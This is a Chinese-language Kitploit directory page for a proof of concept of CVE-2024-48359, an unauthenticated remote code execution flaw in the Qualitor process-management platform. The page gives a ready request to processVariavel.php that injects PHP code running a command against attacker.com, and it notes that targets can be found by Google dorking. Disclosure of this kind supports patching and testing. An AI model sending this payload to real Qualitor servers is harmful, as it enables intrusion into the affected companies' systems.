Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-48359 — CVE-2024-48359 PoC | Kitploit
工具/GitHubGitHub/openxp-research/cve-2024-48359
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubopenxp-research/cve-2024-48359

CVE-2024-48359

CVE-2024-48359 PoC

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-48359 - Qualitor <= v8.24 未经身份验证的远程代码执行漏洞利用

CVE-2024-48359 | Qualitor <= v8.24 RCE

描述

Qualitor 是一个业务流程管理平台,该系统存在于巴西的许多公司中,只需使用 Google dorking 即可识别。

我们团队发现该应用存在一个易受远程代码执行 (RCE) 影响的漏洞,该漏洞允许远程执行系统命令。

这是对 CVE-2023-47253 修复的绕过方法。

概念验证 (POC)

只需在页面 processVariavel.php 中发送 PHP 代码,例如:/html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=nl2br(stream_get_contents(popen('ping attacker.com', 'r')));

image

研究人员

https://www.linkedin.com/in/xvinicius/

https://www.linkedin.com/in/hairrison-wenning-4631a4124/

  • OpenXP 研究团队
下载工具